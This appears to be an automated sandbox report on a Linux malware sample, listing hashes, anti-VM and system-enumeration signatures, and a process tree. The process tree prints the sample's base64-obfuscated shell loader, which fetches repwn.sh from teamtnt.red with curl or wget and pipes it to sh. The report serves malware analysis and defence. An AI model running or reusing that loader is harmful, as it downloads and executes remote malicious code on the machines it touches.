Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20240523-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu2404-amd64-20240523-en, kernel:6.8.0-31-generic, locale:en-us, os:ubuntu-24.04-amd64, system
  • submitted
    22-12-2024 00:24

General

  • Target

    fdac214635e7de8f09f942c53dede7849fe15552099f794827cbac73c112003c

  • Size

    5.3MB

  • MD5

    e3850f7fa3eae086967759c893cbc50c

  • SHA1

    932d4668d6cc83b82878f50690ea09ac9e599932

  • SHA256

    fdac214635e7de8f09f942c53dede7849fe15552099f794827cbac73c112003c

  • SHA512

    86317f162894e5d29086464550b69ce14a6684e0037d789a8e14ceff86d6ff8a9ab2a722b725a13c1c375dceddc480ac9af46644ec5e428360e4ade877461473

  • SSDEEP

    98304:Bdf5TA6jvPzJ7FcwquNlcBsG8gmVp4sMxBIRdkYAqYw67b3kAOXNhR4TjzopoyNo:dA4D4c1P7OBx

Malware Config

Signatures

  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicates whether the system is a virtual machine.

  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system information such as serial numbers, manufacturer names, etc.

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicates whether the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 3 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 60 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 5 IoCs

    Reads data from /proc virtual filesystem.

  • cURL User-Agent 1 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • /tmp/fdac214635e7de8f09f942c53dede7849fe15552099f794827cbac73c112003c
    /tmp/fdac214635e7de8f09f942c53dede7849fe15552099f794827cbac73c112003c
    1⤵
    • Checks hardware identifiers (DMI)
    • Reads hardware information
    • Checks CPU configuration
    • Reads CPU attributes
    • Enumerates kernel/hardware configuration
    • Reads runtime system information
    PID:2825
    • /bin/sh
      sh -c "echo aWYgdHlwZSBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsOyB0aGVuIGN1cmwgLXMgaHR0cDovL3RlYW10bnQucmVkL3JlcHduLnNoIHwgc2ggMj4vZGV2L251bGwgMT4vZGV2L251bGwKZWxpZiB0eXBlIHdnZXQgMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4gd2dldCAtcSAtTyAtIGh0dHA6Ly90ZWFtdG50LnJlZC9yZXB3bi5zaCB8IHNoIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsCmZpCg== | base64 -d | sh"
      2⤵
      PID:2827
      • /usr/bin/base64
        base64 -d
        3⤵
        • Deobfuscate/Decode Files or Information
        PID:2829
      • /usr/bin/sh
        sh
        3⤵
        PID:2830
        • /usr/bin/curl
          curl -s http://teamtnt.red/repwn.sh
          4⤵
          • Reads runtime system information
          PID:2831
        • /usr/bin/sh
          sh
          4⤵
          PID:2832